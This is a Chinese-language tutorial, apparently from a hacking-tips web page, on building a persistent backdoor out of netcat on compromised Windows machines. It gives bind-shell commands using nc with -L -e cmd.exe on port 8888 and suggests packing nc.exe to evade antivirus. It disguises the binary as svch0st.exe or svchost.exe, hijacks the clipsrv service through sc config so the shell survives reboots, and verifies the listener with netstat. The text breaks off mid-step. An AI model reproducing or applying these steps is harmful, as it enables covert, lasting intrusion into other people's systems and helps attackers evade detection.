大家都知道nc是一個強大并且靈活的 工具，用他可以做很多事情，譬如做為telnet的客戶端口，譬如入侵的時候反彈回來shell，譬如掃描……但是你有沒有想過將他打造成一個服務級的后門呢？現(xiàn)在好多跟我一樣的菜鳥還不懂得編程，別人寫的流行點的后門又經(jīng)常被殺，那就跟我一起來自己手工制作一個后門吧，不需要任何編程知識菜鳥級的東東哦，

教你用NC打造成自己的簡單后門

。

　　首先請準備好不被殺的nc.exe（隨便加個殼就可以了的），還有sc.exe（這個是操作服務的一個小工具，被人稱為操作服務的軍刀），這些就可以打造我們自己的后門了，后門的要求我想不需要很強的操作功能，只需要當我們連接的時候獲得一個system權限的shell就可以了，有了cmdshell做什么不可以呢。如果你需要反彈的后門，也可以做到，自己注冊個域名就可以用nc反彈了，因為比較復雜這里就不說了。我們知道nc就是實現(xiàn)我們的后門功能的最經(jīng)典的工具，我們來看看nc的幫助，命令行下輸入nc -h就可以看到，我們主要用到的幾個參數(shù)如下：

-e 綁定一個程序并且連接時執(zhí)行
-l 監(jiān)聽模式
-p 指定nc要運行的本地端口
-L 增強了的監(jiān)聽模式，當連接斷開時再次監(jiān)聽

　　至于其他的用法相信各位已經(jīng)很了解了的，我們以前經(jīng)常用到的是

nc -l -e cmd.exe -p 8888 \\監(jiān)聽8888端口，當有連接時重定向到cmd.exe實現(xiàn)綁定一個shell\\

　　這樣的形式用serveru等溢出程序執(zhí)行后來綁定一個可以得到shell的端口8888，我們telnet或者nc連接上來的時候就可以直接獲得一個shell。但是這樣連接斷開之后監(jiān)聽的端口就會關閉，是一次性的，不能再次獲得shell，這樣當然不適合于做后門了。后來發(fā)現(xiàn)nc的這個參數(shù)L可以一直保持監(jiān)聽的狀態(tài)，可以反復連接，

電腦資料

《教你用NC打造成自己的簡單后門》(http://www.lotusphilosophies.com)。用

nc -L -e cmd.exe -p 8888 \\也是綁定的，不過加強了的\\

　　這樣的命令就已經(jīng)達到我們的目的了，但是我們往往是在溢出的shell里工作，留后門是為了以后的進入，那我們?nèi)绾伪ＷCnc再機器重起之后還可以工作從而實現(xiàn)我們的后門的目的呢？你可以把他放到注冊表的Run等啟動項下面，但是感覺那樣不是太好，有些地方已經(jīng)被殺毒軟件盯上了，把我的后門放到那里實在不是很放心，后來想到干脆作成服務吧！隨著系統(tǒng)啟動而啟動，呵呵。那就看看如何打造服務吧！

　　首先我們將nc.exe放到%systemroot%\system32下面，起名叫svch0st.exe或者放到%systemroot%\system下面更名叫svchost.exe，這樣的目的是為了在任務管理器里看不出異樣。然后用sc替換系統(tǒng)的服務，不用改別的，只要修改他的執(zhí)行路徑就可以了，我們就改那個clipsrv.exe服務吧！命令如下：

sc config clipsrv start= auto \\將clipsrv.exe服務設置為自動\\
sc config clipsrv binpath= "c:\winnt\system32\svch0st.exe -L -e cmd.exe -p 8888" \\設置clipsrv.exe服務的啟動路徑為我們的nc\\
sc start clipsrv \\啟動clipsrv.exe服務\\

　　嘿嘿，但是看看結果吧！看看服務里的顯示信息，如圖一，很顯眼哦！不管，先啟動服務然后

    netstat -an　find "8888" \\netstat -an的結果中查找8888看我們的程序是否運行\(zhòng)\